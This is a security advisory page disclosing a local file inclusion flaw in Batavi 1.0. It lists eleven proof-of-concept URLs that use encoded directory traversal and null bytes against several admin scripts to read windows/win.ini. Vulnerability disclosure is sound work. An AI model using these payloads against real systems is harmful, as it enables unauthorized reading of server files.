Home
Consulting
Advisories
Software
Articles
Contact

Batavi 1.0 Local File Inclusion

Legacy Advisories

Description

A local file inclusion vulnerability in Batavi 1.0 can be exploited to include arbitrary files.

Proof Of Concept

http://localhost/batavi/admin/templates/pages/templates_boxes/info.php?module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

http://localhost/batavi/admin/templates/pages/templates/batch_delete.php?template=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

http://localhost/batavi/admin/templates/pages/templates/delete_rule.php?template=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

http://localhost/batavi/admin/templates/pages/templates/edit.php?template=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

http://localhost/batavi/admin/templates/pages/templates/edit_rule.php?template=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

http://localhost/batavi/admin/templates/pages/templates/info.php?template=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

http://localhost/batavi/admin/templates/pages/templates/uninstall.php?template=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

http://localhost/batavi/admin/templates/pages/images/main.php?module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

http://localhost/batavi/admin/templates/pages/statistics/main.php?module=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

http://localhost/batavi/admin/templates/pages/export/download.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini

http://localhost/batavi/admin/templates/pages/page_layout/main.php?filter=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00


Copyright © 2018 AutoSec Tools LLC